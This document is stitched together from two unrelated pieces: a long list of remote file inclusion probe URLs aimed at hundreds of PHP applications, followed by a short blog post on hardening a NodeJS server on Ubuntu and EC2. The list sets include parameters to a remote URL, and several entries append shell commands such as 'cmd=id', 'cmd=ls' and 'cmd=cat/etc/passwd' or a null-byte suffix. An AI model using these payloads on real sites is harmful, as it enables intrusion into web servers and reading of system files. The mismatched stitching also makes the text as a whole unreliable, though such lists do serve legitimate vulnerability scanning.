/catalogg/inludes/include_once.php?include_file=http://www.google.com/humans.txt?
/catalogshop.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/cdsagenda/modification/SendAlertEmail.php?AGE=http://www.google.com/humans.txt?
/cfagcms/themes/default/index.php?main=http://www.google.com/humans.txt?
/ch_readalso.php?read_xml_include=http://www.google.com/humans.txt?
/challenge.php?vwar_root=http://www.google.com/humans.txt?
/change_preferences2.php?target=http://www.google.com/humans.txt?
/chat.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt?
/chat.php?my[root]=http://www.google.com/humans.txt?cm=id
/chat/adminips.php?banned_file=http://www.google.com/humans.txt?
/chat/users_popupL.php3?From=http://www.google.com/humans.txt?
/checkout.php?abs_path=http://www.google.com/humans.txt?
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://www.google.com/humans.txt?'
/circ.php?include_path=http://www.google.com/humans.txt?
/circolari/cir_save.php?CLASSPATH=http://www.google.com/humans.txt?
/citywriter/head.php?path=http://www.google.com/humans.txt?
/cl_files/index.php?path_to_calendar=http://www.google.com/humans.txt?
/claroline/auth/ldap/authldap.php?includePath=http://www.google.com/humans.txt?
/claroline/phpbb/page_tail.php?includePath=http://www.google.com/humans.txt?
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=http://www.google.com/humans.txt?
/class.mysql.php?path_to_bt_dir=http://www.google.com/humans.txt?
/class/Wiki/Wiki.php?c_node[class_path]=http://www.google.com/humans.txt?
/class/jpcache/jpcache.php?_PSL[classdir]=http://www.google.com/humans.txt?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classified.php?insPath=http://www.google.com/humans.txt?
/classified_right.php?language_dir=http://www.google.com/humans.txt?
/classifieds/index.php?lowerTemplate=http://www.google.com/humans.txt?
/clear.php?bibtexrootrel=http://www.google.com/humans.txt?
/clearinfo.php?bibtexrootrel=http://www.google.com/humans.txt?
/click.php?dir=http://www.google.com/humans.txt?
/client.php?dir=http://www.google.com/humans.txt?
/client/faq_1/PageController.php?dir=http://www.google.com/humans.txt?
/clients/index.php?src=http://www.google.com/humans.txt?
/cls_fast_template.php?fname=http://www.google.com/humans.txt?
/cm68news/engine/oldnews.inc.php?addpath=http://www.google.com/humans.txt?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://www.google.com/humans.txt?
/cms/meetweb/classes/ManagerResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/RegForm.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/RegResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/RegRightsResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/modules.php?root_path=http://www.google.com/humans.txt?
/cms/modules/form.lib.php?sourceFolder=http://www.google.com/humans.txt?
/cms/system/openengine.php?oe_classpath=http://www.google.com/humans.txt???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://www.google.com/humans.txt?
/cn_config.php?tpath=http://www.google.com/humans.txt?
/coast/header.php?sections_file=http://www.google.com/humans.txt?
/code/berylium-classes.php?beryliumroot=http://www.google.com/humans.txt?
/code/display.php?admindir=http://www.google.com/humans.txt?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.google.com/humans.txt?
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.google.com/humans.txt?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/comments.php?AMG_serverpath=http://www.google.com/humans.txt?
/comments.php?scriptpath=http://www.google.com/humans.txt?
/common.inc.php?CFG[libdir]=http://www.google.com/humans.txt?
/common.inc.php?base_path=http://www.google.com/humans.txt?
/common.php?db_file=http://www.google.com/humans.txt?
/common.php?dir=http://www.google.com/humans.txt?
/common.php?ezt_root_path=http://www.google.com/humans.txt?
/common.php?include_path=http://www.google.com/humans.txt?
/common.php?livealbum_dir=http://www.google.com/humans.txt?
/common.php?locale=http://www.google.com/humans.txt?
/common.php?phpht_real_path=http://www.google.com/humans.txt?
/common/db.php?commonpath=http://www.google.com/humans.txt?
/common/func.php?CommonAbsD=http://www.google.com/humans.txt?
/common/func.php?CommonAbsDir=http://www.google.com/humans.txt?
/community/Offline.php?sourcedir=http://www.google.com/humans.txt?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.google.com/humans.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/components/core/connect.php?language_path=http://www.google.com/humans.txt?
/components/minibb/bb_plugins.php?absolute_path=http://www.google.com/humans.txt?
/components/minibb/index.php?absolute_path=http://www.google.com/humans.txt?
/components/xmlparser/loadparser.php?absoluteurl=http://www.google.com/humans.txt?
/compteur/mapage.php?chemin=http://www.google.com/humans.txt?
/conf.php?securelib=http://www.google.com/humans.txt?
/config.inc.php3?rel_path=http://www.google.com/humans.txt?
/config.inc.php?_path=http://www.google.com/humans.txt?
/config.inc.php?path_escape=http://www.google.com/humans.txt?
/config.inc.php?path_escape=http://www.google.com/humans.txt?%00
/config.php?full_path=http://www.google.com/humans.txt?
/config.php?full_path_to_db=http://www.google.com/humans.txt?
/config.php?fullpath=http://www.google.com/humans.txt?
/config.php?incpath=http://www.google.com/humans.txt?
/config.php?path_to_root=http://www.google.com/humans.txt?
/config.php?rel_path=http://www.google.com/humans.txt?
/config.php?returnpath=http://www.google.com/humans.txt?
/config.php?sql_language=http://www.google.com/humans.txt?
/config.php?xcart_dir=http://www.google.com/humans.txt?
/config/config_admin.php?INC=http://www.google.com/humans.txt?
/configuration.php?absolute_path=http://www.google.com/humans.txt?
/confirmUnsubscription.php?output=http://www.google.com/humans.txt?
/connect.php?path=http://www.google.com/humans.txt?
/contenido/external/frontend/news.php?cfg[path][includes]=http://www.google.com/humans.txt?
/content.php?content=http://www.google.com/humans.txt?
/content/admin.php?pwfile=http://www.google.com/humans.txt?
/content/modify_go.php?pwfile=http://www.google.com/humans.txt?
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=http://www.google.com/humans.txt?
/contrib/mx_glance_sdesc.php?mx_root_path=http://www.google.com/humans.txt?
/contrib/phpBB2/modules.php?phpbb_root_path=http://www.google.com/humans.txt?
/controllers/MySQLController.php?baseDir=http://www.google.com/humans.txt?
/controllers/SQLController.php?baseDir=http://www.google.com/humans.txt?
/controllers/SetupController.php?baseDir=http://www.google.com/humans.txt?
/controllers/VideoController.php?baseDir=http://www.google.com/humans.txt?
/controllers/ViewController.php?baseDir=http://www.google.com/humans.txt?
/convert-date.php?cal_dir=http://www.google.com/humans.txt?
/convert/mvcw.php?step=1&vwar_root=http://www.google.com/humans.txt?
/convert/mvcw.php?vwar_root=http://www.google.com/humans.txt?
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlhttp://www.google.com/humans.txt?
/core/admin/editdel.php?p=admin&absoluteurlhttp://www.google.com/humans.txt?
/core/admin/ftpfeature.php?p=admin&absoluteurlhttp://www.google.com/humans.txt?
/core/admin/login.php?absoluteurlhttp://www.google.com/humans.txt?
/core/admin/pgRSSnews.php?absoluteurlhttp://www.google.com/humans.txt?
/core/admin/showcat.php?absoluteurlhttp://www.google.com/humans.txt?
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlhttp://www.google.com/humans.txt?
/core/archive_cat.php?absoluteurlhttp://www.google.com/humans.txt?
/core/archive_nocat.php?absoluteurlhttp://www.google.com/humans.txt?
/core/aural.php?site_absolute_path=http://www.google.com/humans.txt?
/core/aural.php?site_absolute_path=http://www.google.com/humans.txt?&cmd=dir
/core/editor.php?editor_insert_bottom=http://www.google.com/humans.txt?
/core/includes.php?CMS_ROOT=http://www.google.com/humans.txt?
/core/recent_list.php?absoluteurlhttp://www.google.com/humans.txt?
/corpo.php?pagina=http://www.google.com/humans.txt?
/cp2.php?securelib=http://www.google.com/humans.txt?
/cpe/index.php?repertoire_config=http://www.google.com/humans.txt?
/crea.php?plancia=http://www.google.com/humans.txt?
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://www.google.com/humans.txt?
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://www.google.com/humans.txt?
/creat_news_all.php?language=http://www.google.com/humans.txt?
/create_file.php?target=http://www.google.com/humans.txt?
/cron.php?ROOT_PATH=http://www.google.com/humans.txt?
/cron.php?include_path=http://www.google.com/humans.txt?
/crontab/run_billing.php?config[include_dir]=http://www.google.com/humans.txt?
/cross.php?url=http://www.google.com/humans.txt?
/custom_vars.php?sys[path_addon]=http://www.google.com/humans.txt?
/customer/product.php?xcart_dir=http://www.google.com/humans.txt?
/cwb/comanda.php?INCLUDE_PATH=http://www.google.com/humans.txt?
/datei.php?config[root_ordner]=http://www.google.com/humans.txt?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=http://www.google.com/humans.txt?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=http://www.google.com/humans.txt?
/dbcommon/include.php?_APP_RELATIVE_PATH=http://www.google.com/humans.txt?
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.google.com/humans.txt?
/debugger.php?config_atkroot=http://www.google.com/humans.txt?
/decoder/gallery.php?ccms_library_path=http://www.google.com/humans.txt?
/decoder/markdown.php?ccms_library_path=http://www.google.com/humans.txt?
/defaults_setup.php?ROOT_PATH=http://www.google.com/humans.txt?cmd=ls
/defines.php?WEBCHATPATH=http://www.google.com/humans.txt?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://www.google.com/humans.txt?&
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=http://www.google.com/humans.txt?
/example-view/templates/dates_list.php?globals[content_dir]=http://www.google.com/humans.txt?
/example-view/templates/root.php?globals[content_dir]=http://www.google.com/humans.txt?
/example.php?site=http://www.google.com/humans.txt?
/example/gamedemo/inc.functions.php?projectPath=http://www.google.com/humans.txt?
/examplefile.php?bibtexrootrel=http://www.google.com/humans.txt?
/files/compose-new.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/folder-rename.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/folders.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/login.php3?err=hack&BSX_HTXDIR=http://www.google.com/humans.txt?
/files/mainfile.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-delete.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-forward.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-header.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-print.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/forum.php?cfg_file=1&fpath=http://www.google.com/humans.txt?
/forum/forum.php?view=http://www.google.com/humans.txt?
/forum/track.php?path=http://www.google.com/humans.txt?
/frame.php?framefile=http://www.google.com/humans.txt?
/ftp.php?path_local=http://www.google.com/humans.txt?
/function.inc.php?path=http://www.google.com/humans.txt?
/function.php?adminfolder=http://www.google.com/humans.txt?
/function.php?gbpfad=http://www.google.com/humans.txt?
/functions.php?include_path=http://www.google.com/humans.txt?
/functions.php?pmp_rel_path=http://www.google.com/humans.txt?
/functions.php?s[phppath]=http://www.google.com/humans.txt?
/functions.php?set_path=http://www.google.com/humans.txt?
/functions/form.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/functions/general.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/functions/groups.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/functions/js.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/galerie.php?config[root_ordner]=http://www.google.com/humans.txt?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=http://www.google.com/humans.txt?
/gallery/lib/content.php?include=http://www.google.com/humans.txt?cmd=ls
/gallerypath/index.php?includepath=http://www.google.com/humans.txt?
/gallery/theme/include_mode/template.php?galleryfilesdir=http://www.google.com/humans.txt?
/games.php?id=http://www.google.com/humans.txt?
/games.php?scoreid=http://www.google.com/humans.txt?
/gbook/includes/header.php?abspath=http://www.google.com/humans.txt?
/gemini/page/forums/bottom.php?lang=http://www.google.com/humans.txt?
/gen_m3u.php?phpbb_root_path=http://www.google.com/humans.txt?
/genepi.php?topdir=http://www.google.com/humans.txt?
/generate.php?ht_pfad=http://www.google.com/humans.txt?
/gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=http://www.google.com/humans.txt?
/get_session_vars.php?path_to_smf=http://www.google.com/humans.txt?
/getpage.php?page=online&doc_path=http://www.google.com/humans.txt?
/global.php?abs_path=http://www.google.com/humans.txt?
/gorum/dbproperty.php?appDirName=http://www.google.com/humans.txt?
/gpb/include/db.mysql.inc.php?root_path=http://www.google.com/humans.txt?
/gpb/include/gpb.inc.php?root_path=http://www.google.com/humans.txt?
/graph.php?DOCUMENT_ROOT=http://www.google.com/humans.txt?
/gruppen.php?config[root_ordner]=http://www.google.com/humans.txt?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=http://www.google.com/humans.txt?
/handlers/page/show.php?sous_rep=http://www.google.com/humans.txt?
/head.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt?
/header.inc.php?CssFile=http://www.google.com/humans.txt?
/header.php?path=http://www.google.com/humans.txt?
/header.php?wwwRoot=http://www.google.com/humans.txt?
/help.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt?
/inc/ltdialogo.php?pathCGX=http://www.google.com/humans.txt?
/inc/mtdialogo.php?pathCGX=http://www.google.com/humans.txt?
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.google.com/humans.txt?
/inc/prepend.inc.php?path=http://www.google.com/humans.txt?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=http://www.google.com/humans.txt?
/inc/settings.php?inc_dir=http://www.google.com/humans.txt?
/inc/settings.ses.php?SPL_CFG[dirroot]=http://www.google.com/humans.txt?
/inc/shows.inc.php?cutepath=http://www.google.com/humans.txt?
/inc/sige_init.php?SYS_PATH=http://www.google.com/humans.txt?
/inc_group.php?include_path=http://www.google.com/humans.txt?
/inc_manager.php?include_path=http://www.google.com/humans.txt?
/inc_newgroup.php.php?include_path=http://www.google.com/humans.txt?
/inc_smb_conf.php?include_path=http://www.google.com/humans.txt?
/inc_user.php?include_path=http://www.google.com/humans.txt?
/include.php?_APP_RELATIVE_PATH=http://www.google.com/humans.txt?
/include.php?gorumDir=http://www.google.com/humans.txt?
/include.php?myng_root=http://www.google.com/humans.txt?
/include.php?path=psp/user.php&site=http://www.google.com/humans.txt?
/include.php?path[docroot]=http://www.google.com/humans.txt?
/include.php?sunPath=http://www.google.com/humans.txt?
/include/Beautifier/Core.php?BEAUT_PATH=http://www.google.com/humans.txt?
/include/HTML_oben.php?include_path=http://www.google.com/humans.txt?
/include/SQuery/gameSpy2.php?libpath=http://www.google.com/humans.txt?
/include/mail.inc.php?root=http://www.google.com/humans.txt?
/include/menu_builder.php?config[page_dir]=http://www.google.com/humans.txt?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://www.google.com/humans.txt?
/include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.google.com/humans.txt?
/include/parser.php?path=http://www.google.com/humans.txt?
/include/pear/IT.php?basepath=http://www.google.com/humans.txt?
/include/pear/ITX.php?basepath=http://www.google.com/humans.txt?
/include/pear/IT_Error.php?basepath=http://www.google.com/humans.txt?
/include/phpxd/phpXD.php?appconf[rootpath]=http://www.google.com/humans.txt?&cmd=id
/include/prodler.class.php?sPath=http://www.google.com/humans.txt???
/include/scripts/export_batch.inc.php?DIR=http://www.google.com/humans.txt?
/include/scripts/run_auto_suspend.cron.php?DIR=http://www.google.com/humans.txt?
/include/scripts/send_email_cache.php?DIR=http://www.google.com/humans.txt?
/include/startup.inc.php?root_path=http://www.google.com/humans.txt?
/includes/xhtml.php?d_root=http://www.google.com/humans.txt?
/index.php3?Application_Root=http://www.google.com/humans.txt?
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=http://www.google.com/humans.txt?
/template.php?pagina=http://www.google.com/humans.txt?
/sw/lib_up_file/find_file.php?doc_directory=http://www.google.com/humans.txt?
/system/admin/include/item_main.php?GLOBALS=http://www.google.com/humans.txt?
/stphpbtnimage.php?STPHPLIB_DIR=http://www.google.com/humans.txt?
/toolbar.loudmouth.php?mainframe=http://www.google.com/humans.txt?
/ytb/cuenta/cuerpo.php?base_archivo=http://www.google.com/humans.txt?
/xarg_corner_bottom.php?xarg=http://www.google.com/humans.txt?

NodeJS setup tips for DevOps

These are steps I took to help secure a NodeJS web application and keep socket.io running reliably on Ubuntu 12.04 on an Amazon EC2 server.

Stop running NodeJS as root and use port fowarding

Because if someone manages to hack some aspect of your application, they could do a lot of damage to your server.

The downside of running a NodeJS process as a non-root user means it can’t read traffic from port 80 or 443, which poses a problem for many web applications. The solution is port forwarding. Here’s an excellent write-up on port forwarding with iptables.

But, next the time the server is rebooted, your iptables config will be gone. They weren’t permanent. To save the configuration, check out Solution #1 in the iptables howto and this stackoverflow Q&A. They both describe the same method, but one page makes it look more complicated than the other.

Reboot the server and view your iptables to check the settings are still applied.

Open File Limits

Linux puts limits on the amount of files a user can have open at once. You can see the limit with the command ulimit -n. Linux also counts open network connections as open files. Using socket.io for realtime web applications causes at least one connection to open (and stay open) as users come to your site, leave it open in a browser tab, and then go somewhere else. On a default Ubuntu setup, ~1000 idling users with socket.io connections open may be enough to bring your NodeJS app down with this error:

Error: EMFILE, Too many open files

You can temporarily set the open file limit higher for the current logged in Linux user with the command ulimit -n 5000, however this change will be wiped out as soon as the Linux shell user logs out. There’s a good blog post on updating ulimit numbers on posidev.com which outlines the steps make the change permanent, even after a reboot.

I’ve gone live already! Is it too late?

If you can swap your active web application server(s) from one machine to another without losing data, it isn’t too late.

In my case, I had a NodeJS app running on an AWS EC2 server, and a database hosted somewhere else by MongoLab. I was able to:

  1. Make a copy of the EC2 server by making an AMI, and launching a new server from it
  2. Make the iptables and ulimit changes on the new server and reboot it to test changes stuck
  3. Check the website was still accessible on the new server by accessing it via its Public DNS (a URL like http://ec2-107-20-193-72.compute-1.amazonaws.com)
  4. Pointing the domain to the new server by re-associating the Elastic IP with the new server
  5. Shutting down the old server.